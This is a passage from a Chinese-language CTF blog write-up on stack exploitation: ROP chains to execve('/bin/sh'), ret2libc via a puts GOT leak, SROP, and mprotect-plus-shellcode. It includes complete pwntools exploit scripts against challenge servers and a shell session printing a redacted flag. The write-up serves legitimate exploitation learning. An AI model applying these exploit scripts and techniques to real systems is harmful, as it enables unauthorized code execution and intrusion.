padding = 'a'*0x400 + 'a'*0x8
payload1 = padding + p64(pop_rdi_add) + p64(0x0) + p64(pop_rsi_add) + p64(bss_add) + p64(pop_rdx_add) + p64(0x100) + p64(read_add) + p64(main_add)
io.recvuntil('Any last words?\n')
io.sendline(payload1)
io.send('/bin/sh\x00')
payload2 = padding + p64(pop_rdi_add) + p64(bss_add) + p64(pop_rsi_add) + p64(0x0) + p64(pop_rdx_add) + p64(0x0) + p64(pop_rax_add) + p64(0x3b) +p64(syscall)
io.recvuntil('Any last words?\n')
io.sendline(payload2)
io.interactive()
</code></pre><p>payload1相当于下面的代码：</p><pre><code class="language-assembly">mov		rdi,0
mov 	rsi,offset bss
mov 	rdx,100h
call	_read			;构造read(0,&amp;bss,0x100)
jmp 	main			;回到main，准备构造第二次rop
</code></pre><p>执行完payload1之后回到main函数</p><p>payload2相当于下面的代码：</p><pre><code class="language-assembly">mov 	rdi,offset bss
mov 	rsi,0
mov 	rdx,0
mov 	rax,3bh
		syscall		;因为rax为3b，所以执行execve("/bin/sh",0,0)
</code></pre><p>成功拿到shell</p><pre><code class="language-shell">$ ls
$ cat flag
[DEBUG] Sent 0x9 bytes:
    'cat flag\n'
[DEBUG] Received 0x19 bytes:
    'flag{*******************}'
</code></pre><h3 id="ret2libc彻底挣脱束缚"><strong>ret2libc——彻底挣脱束缚</strong></h3><h4 id="stackoverflow_ret2libc"><strong>StackOverflow_ret2libc</strong></h4><p>保护机制：</p><pre><code class="language-sh">$ checksec stackoverflow_ret2libc
Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)
</code></pre><p>之后分析程序就懵逼了：</p><pre><code class="language-c">int __cdecl main(int argc, const char **argv, const char **envp)
{
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  puts("Please input your ID:");
  get_id();
  puts("Done");
  return 0;
}

ssize_t get_id()
{
  char buf; // [rsp+0h] [rbp-20h]

  return read(0, &amp;buf, 0x50uLL);
}
</code></pre><p>只有这两个能用的，没有/bin/sh，没有system，这时候就需要去libc.so里面找外部函数执行了。</p><p>libc.so里面集成了大量的系统级函数，其中就包括system，还包括字符串”/bin/sh”。由于动态链接时共享文件的最终装载地址在编译时是不确定的，所以我们需要泄露出libc的基址从而获取装载的偏移量（确定的）。</p><p>利用思路：通过输出函数将got表中的某个函数的地址泄露出来，然后减去libc中对应函数的地址就得到了偏移量，然后再用偏移量加上其他函数在libc中的地址，就得到了其他函数。</p><p>exp：</p><pre><code class="language-python">#!/usr/bin/env python
from pwn import *
# context.log_level = 'debug'
io=remote('118.190.133.9',10003
)elf=ELF('./StackOverflow_ret2libc')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main_add=elf.symbols['main']
padding = 'a'*0x20+'a'*0x8
rdi = 0x0000000000400783
payload1 = padding + p64(rdi) + p64(puts_got) +p64(puts_plt) + p64(main_add)
io.recvuntil("Please input your ID:\n")
io.sendline(payload1)
leak = u64(io.recv()[0:8]+'\x00\x00')
libc = ELF('./x64-libc-2.23.so')
offset = leak - libc.symbols['puts']
sys_add = offset + libc.symbols['system']
binsh_add = offset + libc.search('/bin/sh').next()
payload2 = padding + p64(rdi)+ p64(binsh_add) + p64(sys_add)
io.recvuntil("Please input your ID:\n")
io.sendline(payload2)
io.interactive()
</code></pre><p>第一个payload将got表中的puts地址泄露出来，用这个地址减去libc中的puts地址即得到offset。</p><p>再用offset加上其他函数的地址就可以得到其他函数的使用权了。</p><p>如果没有libc的话可以pip install一个LibcSearcher库用。</p><p><a href="https://github.com/lieanu/LibcSearcher">https://github.com/lieanu/LibcSearcher</a></p><blockquote><p>以下内容简略介绍。</p></blockquote><h3 id="srop"><strong>SROP</strong></h3><p>SROP(Sigreturn Oriented Programming)于2014年被Vrije Universiteit Amsterdam的Erik Bosman提出，其相关研究<strong><code>Framing Signals — A Return to Portable Shellcode</code></strong>发表在安全顶级会议<a href="http://www.ieee-security.org/TC/SP2014">Oakland 2014</a>上，被评选为当年的<a href="http://www.ieee-security.org/TC/SP2014/awards.html">Best Student Papers</a>。</p><p><strong>ciscn_2019_s_3</strong></p><p>因为给了15h，可以直接SROP</p><pre><code class="language-c">signed __int64 gadgets()
{
  return 15LL;
}
</code></pre><p>先泄露栈地址，然后用栈把/bin/sh读入execve：</p><pre><code class="language-python">#!/usr/bin/env python
from pwn import *
context(arch='amd64',os='linux',log_level='debug')
#io = process('./ciscn_s_3')
io = remote('node3.buuoj.cn',25931)
vuln_add = 0x4004ED
syscall = 0x400517
gadget = 0x4004DA
payload = '/bin/sh\x00'*2+p64(vuln_add)io.send(payload)io.recv(0x20)
sh = u64(io.recv(8))-0x118
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = sh
frame.rsi = 0x0
frame.rdx = 0x0
frame.rsp = sh
frame.rip = syscall
payload = '/bin/sh\x00'*2 + p64(gadget) + p64(syscall) + str(frame)
io.sendline(payload)
io.interactive()
</code></pre><h3 id="mprotect使用"><strong>mprotect使用</strong></h3><pre><code class="language-c">int mprotect(const void *start, size_t len, int prot);
</code></pre><p>含义：<strong>从start开始长度为len的内存区的保护属性修改为prot指定的值，prot的值和linux的权限属性值相同。</strong></p><h4 id="get_started_3dsctf_2016"><strong>get_started_3dsctf_2016</strong></h4><p>get_flag函数在远程根本不能用。</p><p>所以另辟蹊径，搜索mprotect函数，可以利用mprotect在bss上面写入可执行权限，之后用read函数在bss上写入shellcode。</p><p>payload：</p><pre><code class="language-python">#!/usr/bin/env python
from pwn import *
context.log_level = 'debug'
io = remote('node3.buuoj.cn',28342)
elf = ELF('./get_started_3dsctf_2016')
pop_3_add = 0x0809e4c5
rw_add = 0x080eb000
payload = 'a'*0x38 + p32(elf.symbols['mprotect']) + p32(pop_3_add) + p32(rw_add) + p32(0x1000) + p32(0x7) + p32(elf.symbols['read']) + p32(pop_3_add) + p32(0x0) + p32(0x080ebf80) +p32(0x200) + p32(0x080ebf80)
io.sendline(payload)
io.sendline(asm(shellcraft.sh(),arch='i386',os='linux'))
io.interactive()
</code></pre><blockquote><p>放下狠话：可能还会更。</p><p>有了！有了！2020-05-09有后续了！<a href="https://surager.github.io/_posts/2020-05-09-ROP-tricks/">ROP tricks</a></p></blockquote><h2 id="0xdeadbeef参考文章"><strong>0xdeadbeef参考文章</strong></h2><p>[<a href="https://www.52pojie.cn/forum.php?mod=forumdisplay&amp;fid=59&amp;filter=typeid&amp;typeid=156">漏洞分析]</a> 栈基础 &amp; 栈溢出 &amp; 栈溢出进阶 <a href="https://www.52pojie.cn/thread-974510-1-1.html">https://www.52pojie.cn/thread-974510-1-1.html</a></p><p>栈溢出从入门到入狱 <a href="https://aidaip.github.io/binary/2019/03/16/%E6%A0%88%E6%BA%A2%E5%87%BA%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%85%A5%E7%8B%B1.html">https://aidaip.github.io/binary/2019/03/16/%E6%A0%88%E6%BA%A2%E5%87%BA%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%85%A5%E7%8B%B1.html</a></p><p>栈溢出原理 <a href="https://wiki.x10sec.org/pwn/stackoverflow/stackoverflow_basic/">https://wiki.x10sec.org/pwn/stackoverflow/stackoverflow_basic/</a></p><p>基本 ROP <a href="https://wiki.x10sec.org/pwn/stackoverflow/basic_rop/">https://wiki.x10sec.org/pwn/stackoverflow/basic_rop/</a></p><p>高级ROP <a href="https://wiki.x10sec.org/pwn/stackoverflow/advanced_rop/">https://wiki.x10sec.org/pwn/stackoverflow/advanced_rop/</a></p><p>checksec及其包含的保护机制 <a href="https://www.jianshu.com/p/8a9ef7205632">https://www.jianshu.com/p/8a9ef7205632</a></p></div><div id="disqus_thread"></div><script> (function() { var d = document, s = d.createElement('script'); s.src = 'https://surager-pub.disqus.com/embed.js'; s.setAttribute('data-timestamp', +new Date()); (d.head || d.body).appendChild(s); })(); </script> <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript> <script> (function($){ setInterval(() => { $.each($('iframe'), (arr,x) => { let src = $(x).attr('src'); if (src && src.match(/(ads-iframe)|(disqusads)/gi)) { $(x).remove(); } }); }, 300); })(jQuery); </script> <br/> <i class="fas fa-coffee fa-fw"></i> <a href="/comments/">如果这篇博客帮助到你，可以留言夸夸我~</a> <br/> <i class="fab fa-creative-commons-by fa-fw"></i> <a href="https://creativecommons.org/licenses/by-nc/4.0/deed.zh" rel="license"> CC BY-NC 4.0 </a> （除特别声明或转载文章外）</div></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css" /><style> .katex-display>.katex { white-space: normal; }</style><script src="https://cdn.jsdelivr.net/combine/npm/katex@0.12.0/dist/katex.min.js,npm/katex@0.12.0/dist/contrib/auto-render.min.js" async="async" onload='renderMathInElement(document.body, { delimiters: [{left: "$$", right: "$$", display: true}, { left: "$", right: "$", display: false }, {left: "\\(", right: "\\)", display: false}, {left: "\\[", right: "\\]", display: true}]})' ></script><style> pre.language-mermaid, code.language-mermaid { display: none; } .mermaid { overflow: auto auto; max-width: 100%; max-height: 66.6vh; }</style><script src="https://cdn.jsdelivr.net/npm/mermaid@8.8.3/dist/mermaid.min.js" async="async" onload=' for(let x of document.getElementsByClassName("language-mermaid")) if(x.nodeName=="CODE") { let m = document.createElement("div"); m.classList.add("mermaid"); m.textContent = x.textContent; x.parentNode.insertAdjacentElement("beforebegin", m); }' ></script><link rel="stylesheet" href="https://cdn.jsdelivr.net/combine/npm/prismjs@1.21.0/plugins/line-numbers/prism-line-numbers.min.css,npm/prismjs@1.21.0/plugins/toolbar/prism-toolbar.min.css,npm/prismjs@1.21.0/plugins/match-braces/prism-match-braces.min.css,npm/prism-themes@1.4.0/themes/prism-nord.min.css" /> <script src="https://cdn.jsdelivr.net/combine/npm/prismjs@1.21.0/components/prism-core.min.js,npm/prismjs@1.21.0/plugins/autoloader/prism-autoloader.min.js,npm/prismjs@1.21.0/plugins/line-numbers/prism-line-numbers.min.js,npm/prismjs@1.21.0/plugins/toolbar/prism-toolbar.min.js,npm/prismjs@1.21.0/plugins/match-braces/prism-match-braces.min.js" async="async" data-autoloader-path="https://cdn.jsdelivr.net/npm/prismjs@1.21.0/components/" onload=' for(let x of document.getElementsByClassName("content")) x.classList.add("line-numbers","match-braces"); Prism.plugins.toolbar.registerButton("select-code", function (env) { let button = document.createElement("button"); button.textContent = "select this " + env.language; button.addEventListener("click", function () { if (document.body.createTextRange) { let range = document.body.createTextRange(); range.moveToElementText(env.element); range.select(); } else if (window.getSelection) { let selection = window.getSelection(); let range = document.createRange(); range.selectNodeContents(env.element); selection.removeAllRanges(); selection.addRange(range); } }); return button; })' ></script></div><label for="sidebar-checkbox" class="sidebar-toggle"></label>
